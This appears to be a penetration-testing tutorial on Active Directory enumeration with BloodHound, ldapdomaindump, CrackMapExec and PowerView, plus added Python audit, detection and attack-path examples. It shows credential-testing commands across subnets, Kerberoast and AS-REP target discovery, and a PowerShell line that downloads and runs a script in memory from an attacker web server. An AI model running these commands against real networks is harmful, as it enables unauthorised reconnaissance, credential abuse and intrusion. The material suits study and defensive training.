Enumeration Toolset
BloodHound
Graph-based AD attack path mapper. Ingests LDAP + SMB data via SharpHound/bloodhound-python and visualizes privilege escalation paths. Essential for finding non-obvious ACL chains.
ldapdomaindump
Dumps AD objects to JSON/HTML files via LDAP. Fast way to get a full user/group/computer listing with all attributes. No binary needed on the target — runs from Kali.
CrackMapExec
Swiss army knife for SMB/LDAP/WinRM enumeration. Tests credentials at scale, enumerates shares, checks local admin access across subnets, lists logged-in sessions.
PowerView
PowerShell AD enumeration framework. Run from a domain-joined machine (or a Windows machine with RSAT). Rich cmdlets for users, groups, ACLs, GPOs, trusts, and Kerberoastable accounts.
BloodHound

Setup and Data Collection

BloodHound consists of two components: the collector (SharpHound on Windows, or bloodhound-python from Kali) and the GUI (a graph database viewer backed by Neo4j). The collector gathers data via LDAP and SMB and outputs JSON files. The GUI imports those files and lets you run pre-built or custom queries.

From Kali, use bloodhound-python if you have valid domain credentials but no foothold on a Windows machine:

# Install
kali@kali:~$ pip3 install bloodhound

# Collect all data (users, groups, computers, ACLs, GPOs, trusts)
kali@kali:~$ bloodhound-python -u jsmith -p 'Password123' \
    -d meridianfg.local -ns 192.168.1.10 -c All

# Outputs: computers.json, users.json, groups.json, domains.json, gpos.json

Start BloodHound and Neo4j, import the JSON files, then use these key built-in queries:

The "Shortest Paths to Domain Admins" query is the single most useful query in BloodHound. Run it immediately after every import to identify your attack objectives. Each edge (arrow) in the graph represents an exploitable relationship: group membership, ACL right, session, or trust.
ldapdomaindump

Dumping AD Objects via LDAP

ldapdomaindump produces human-readable HTML and machine-parseable JSON files for every major AD object class. It is fast, non-destructive, and runs entirely from Kali with any valid domain credential.

# Run ldapdomaindump
kali@kali:~$ ldapdomaindump -u 'meridianfg\jsmith' -p 'Password123' \
    192.168.1.10 -o ./ldd-output/

# Output files
# domain_users.html     — all users with attributes
# domain_groups.html    — all groups and members
# domain_computers.html — all machine accounts
# domain_policy.html    — password policy, lockout threshold
# domain_trusts.html    — trust relationships

The domain_policy.html file is particularly useful — it shows the password policy (minimum length, complexity, lockout threshold) which determines whether password spraying is safe (i.e. whether you'll lock accounts).

Check the lockout threshold in domain_policy.html before any password spray. If the lockout threshold is 3 invalid attempts, a spray with more than 2 password guesses per account per observation window will lock accounts — which creates incident alerts and denies legitimate users access.
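As an added example (not part of the original page or of ldapdomaindump), a small offline audit over the JSON files the tool writes next to the HTML: it pulls out the same findings a reviewer would hunt for in domain_users.html and domain_policy.html. The JSON layout and the sample entries are assumptions, constructed here; check the layout against your own dump before relying on it.

```python
import json

# Constructed sample in the layout ldapdomaindump is assumed to write: a list of
# entries with "dn" and an "attributes" dict; single values may be scalar or list.
SAMPLE_USERS = json.dumps([
    {"dn": "CN=jsmith,CN=Users,DC=meridianfg,DC=local",
     "attributes": {"sAMAccountName": "jsmith", "userAccountControl": 512}},
    {"dn": "CN=svc_sql,CN=Users,DC=meridianfg,DC=local",
     "attributes": {"sAMAccountName": "svc_sql", "userAccountControl": 66048,
                    "servicePrincipalName": ["MSSQLSvc/sql01.meridianfg.local:1433"],
                    "description": "SQL service - password kept in team wiki"}},
    {"dn": "CN=legacy_app,CN=Users,DC=meridianfg,DC=local",
     "attributes": {"sAMAccountName": ["legacy_app"], "userAccountControl": [4194816]}},
])
SAMPLE_POLICY = json.dumps([{"dn": "DC=meridianfg,DC=local",
                             "attributes": {"minPwdLength": 7, "lockoutThreshold": 0}}])

DONT_REQ_PREAUTH = 0x400000      # userAccountControl bit (ADS_UF_DONT_REQUIRE_PREAUTH)

def first(attrs, name, default=None):
    """Return an attribute's single value whether it was dumped as scalar or list."""
    val = attrs.get(name, default)
    return (val[0] if val else default) if isinstance(val, list) else val

def audit_users(users_json):
    """Return {sAMAccountName: [finding, ...]} for accounts a reviewer should look at."""
    findings = {}
    for entry in json.loads(users_json):
        a = entry["attributes"]
        uac = int(first(a, "userAccountControl", 0))
        hits = []
        if uac & DONT_REQ_PREAUTH:
            hits.append("AS-REP roastable: Kerberos pre-auth disabled")
        if a.get("servicePrincipalName"):
            hits.append("Kerberoastable: SPN set on a user account")
        if first(a, "description"):
            hits.append("description may leak: " + first(a, "description"))
        if hits:
            findings[first(a, "sAMAccountName", entry["dn"])] = hits
    return findings

def audit_policy(policy_json):
    """Return weak settings from domain_policy.json, the file to read before anything else."""
    a = json.loads(policy_json)[0]["attributes"]
    weak = []
    if int(first(a, "lockoutThreshold", 0)) == 0:
        weak.append("lockoutThreshold=0: accounts never lock out (no brute-force throttle)")
    if int(first(a, "minPwdLength", 0)) < 12:
        weak.append(f"minPwdLength={first(a, 'minPwdLength')}: shorter than 12")
    return weak
```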
CrackMapExec

SMB, LDAP, and WinRM Enumeration at Scale

CrackMapExec (CME) is the fastest way to validate credentials against many hosts simultaneously and to enumerate SMB information without needing to be domain-joined. Install it on Kali: apt install crackmapexec.

# Test a credential against the domain
kali@kali:~$ crackmapexec smb 192.168.1.0/24 -u jsmith -p 'Password123' -d meridianfg.local

# List SMB shares on a host
kali@kali:~$ crackmapexec smb 192.168.1.10 -u jsmith -p 'Password123' --shares

# Check which hosts the account has local admin on (marked Pwn3d!);
# --local-auth authenticates against each host's local SAM instead of the domain
kali@kali:~$ crackmapexec smb 192.168.1.0/24 -u jsmith -p 'Password123' --local-auth

# List logged-in sessions on a machine (requires admin)
kali@kali:~$ crackmapexec smb 192.168.1.20 -u administrator -p 'Admin123!' --sessions

# Enumerate users via LDAP
kali@kali:~$ crackmapexec ldap 192.168.1.10 -u jsmith -p 'Password123' --users

A green [+] next to a host means the credential authenticated. Pwn3d! means the account has local administrator access on that host — a key finding for lateral movement planning.

CrackMapExec outputs are color-coded: green = success, red = failure. Save output with --log cme.log or pipe to a file. The CME database (~/.cme/cme.db) stores all credentials and hosts automatically for later reference.
PowerView

Deep AD Enumeration from Windows

PowerView is a PowerShell module that provides rich AD enumeration when you have execution on a Windows machine (domain-joined or with RSAT installed). Load it in memory to avoid writing to disk:

# Load PowerView in memory from a web server
PS> IEX (New-Object Net.WebClient).DownloadString('http://<kali-ip>:8080/PowerView.ps1')

# Or from a local path
PS> Import-Module .\PowerView.ps1

Key PowerView commands for enumeration:

# Domain information
PS> Get-Domain
PS> Get-DomainController
PS> Get-DomainTrust

# Users
PS> Get-DomainUser | Select SamAccountName, Description, PasswordLastSet, ServicePrincipalName
PS> Get-DomainUser -UACFilter DONT_REQ_PREAUTH   # AS-REP Roastable
PS> Get-DomainUser -SPN                           # Kerberoastable

# Groups
PS> Get-DomainGroup "Domain Admins" | Select Member
PS> Get-DomainGroupMember -Identity "Domain Admins" -Recurse

# Computers
PS> Get-DomainComputer | Select Name, OperatingSystem, IPv4Address

# ACLs — find interesting ACEs for a given user
# (Get-DomainObjectAcl takes -Identity; -SamAccountName belonged to the older Get-ObjectAcl)
PS> Get-DomainObjectAcl -Identity jsmith -ResolveGUIDs

# GPOs
PS> Get-DomainGPO | Select DisplayName, GpcFileSysPath

# Find machines where a high-value user is logged in
PS> Find-DomainUserLocation -UserGroupIdentity "Domain Admins"

PowerView generates LDAP queries that may appear in SIEM logs. On a real engagement, use it deliberately — don't enumerate everything at once. In the lab, run freely to build muscle memory.
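An added example, not from the page or from PowerView, of the detection side of that note: scoring each client by how many distinct class-wide LDAP searches it issues inside a short window, which is the signature the collectors above leave. The log line layout and the lines themselves are constructed; a real feed would come from DC directory-service logging or a network sensor, and only the parser would change.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log lines, one LDAP search per line in a simplified field=value layout
# (a real source would be DC Event ID 1644 or a network sensor's LDAP decode).
LOG = """\
2024-05-01T10:00:01Z client=192.168.1.50 user=jsmith scope=sub filter=(samAccountType=805306368)
2024-05-01T10:00:02Z client=192.168.1.50 user=jsmith scope=sub filter=(samAccountType=805306369)
2024-05-01T10:00:02Z client=192.168.1.50 user=jsmith scope=sub filter=(objectClass=group)
2024-05-01T10:00:03Z client=192.168.1.50 user=jsmith scope=sub filter=(objectClass=trustedDomain)
2024-05-01T10:00:04Z client=192.168.1.50 user=jsmith scope=sub filter=(servicePrincipalName=*)
2024-05-01T10:00:05Z client=192.168.1.50 user=jsmith scope=sub filter=(userAccountControl:1.2.840.113556.1.4.803:=4194304)
2024-05-01T10:00:09Z client=192.168.1.77 user=pc07$ scope=base filter=(objectClass=*)
2024-05-01T11:30:00Z client=192.168.1.90 user=helpdesk scope=sub filter=(sAMAccountName=jdoe)
2024-05-01T11:30:01Z client=192.168.1.90 user=helpdesk scope=sub filter=(objectClass=group)
"""
LINE_RE = re.compile(r"^(?P<ts>\S+) client=(?P<client>\S+) user=(?P<user>\S+) "
                     r"scope=(?P<scope>\S+) filter=(?P<filter>.+)$")

# Class-wide filters the collectors issue; each is also normal admin traffic alone.
ENUM_FILTERS = {
    "(samAccountType=805306368)": "all users",
    "(samAccountType=805306369)": "all computers",
    "(objectClass=group)": "all groups",
    "(objectClass=trustedDomain)": "trusts",
    "(servicePrincipalName=*)": "SPN accounts",
    "(userAccountControl:1.2.840.113556.1.4.803:=4194304)": "pre-auth disabled accounts",
}

def detect_enumeration(log_text, window=timedelta(minutes=5), min_kinds=3):
    """Return {client: sorted kinds} for clients with >= min_kinds distinct class-wide subtree searches in `window`."""
    events = defaultdict(list)                      # client -> [(time, kind)]
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["scope"] != "sub":            # base-scope lookups are not enumeration
            continue
        kind = ENUM_FILTERS.get(m["filter"])
        if kind:
            ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
            events[m["client"]].append((ts, kind))
    alerts = {}
    for client, evs in events.items():
        evs.sort()
        for i, (start, _) in enumerate(evs):        # slide the window over this client's searches
            kinds = {k for t, k in evs[i:] if t - start <= window}
            if len(kinds) >= min_kinds:
                alerts[client] = sorted(kinds)
                break
    return alerts
```

Tune `min_kinds` and `window` to the noise in your own directory; a single all-users query from a helpdesk host is expected, five different object classes in a few seconds from one workstation is not.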
What to Enumerate and Why

Building the Attack Map

Enumeration is not about collecting data for its own sake — it's about answering specific questions that determine your attack path:

Combine BloodHound's attack paths with CME's session data. BloodHound tells you which account to target; session data tells you which machine that account is currently on. Together they give you a complete attack plan before you execute a single exploit.
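An added example (not BloodHound's or CME's code) that puts the BloodHound section and this one in one place: a breadth-first search over the kind of edges SharpHound collects, with the HasSession edge standing in for the session data CME --sessions returns, plus the edges a defender would remove to break the path. The edge list and the domain names are constructed.

```python
from collections import defaultdict, deque

# Constructed edge list (not an export from any real domain) using BloodHound's edge
# names: group membership, local admin, a logged-on session, and an ACL right.
EDGES = [
    ("JSMITH@MERIDIANFG.LOCAL",       "MemberOf",   "HELPDESK@MERIDIANFG.LOCAL"),
    ("JSMITH@MERIDIANFG.LOCAL",       "MemberOf",   "DOMAIN USERS@MERIDIANFG.LOCAL"),
    ("HELPDESK@MERIDIANFG.LOCAL",     "AdminTo",    "WS01.MERIDIANFG.LOCAL"),
    ("WS01.MERIDIANFG.LOCAL",         "HasSession", "SVC_BACKUP@MERIDIANFG.LOCAL"),
    ("SVC_BACKUP@MERIDIANFG.LOCAL",   "GenericAll", "IT-ADMINS@MERIDIANFG.LOCAL"),
    ("IT-ADMINS@MERIDIANFG.LOCAL",    "MemberOf",   "DOMAIN ADMINS@MERIDIANFG.LOCAL"),
    ("DOMAIN USERS@MERIDIANFG.LOCAL", "CanRDP",     "WS02.MERIDIANFG.LOCAL"),
]
DOMAIN_ADMINS = "DOMAIN ADMINS@MERIDIANFG.LOCAL"

def build_graph(edges):
    """Adjacency list: node -> [(relation, neighbour)], directed as BloodHound draws them."""
    graph = defaultdict(list)
    for src, rel, dst in edges:
        graph[src].append((rel, dst))
    return graph

def shortest_path(graph, start, target):
    """BFS from start to target; returns [(src, relation, dst), ...] or None if unreachable."""
    prev = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == target:
            break
        for rel, nxt in graph.get(node, []):
            if nxt not in prev:                 # first visit is the shortest hop count
                prev[nxt] = (node, rel)
                queue.append(nxt)
    if target not in prev:
        return None
    path, cur = [], target
    while prev[cur] is not None:                # walk back from the target
        node, rel = prev[cur]
        path.append((node, rel, cur))
        cur = node
    return path[::-1]

def cut_candidates(path):
    """Non-membership edges on the path (admin grant, open session, ACL right): removing any one breaks it."""
    return [edge for edge in path if edge[1] != "MemberOf"]

def session_hosts(edges, user):
    """Machines where `user` is currently logged on, per the HasSession edges."""
    return [src for src, rel, dst in edges if rel == "HasSession" and dst == user]
```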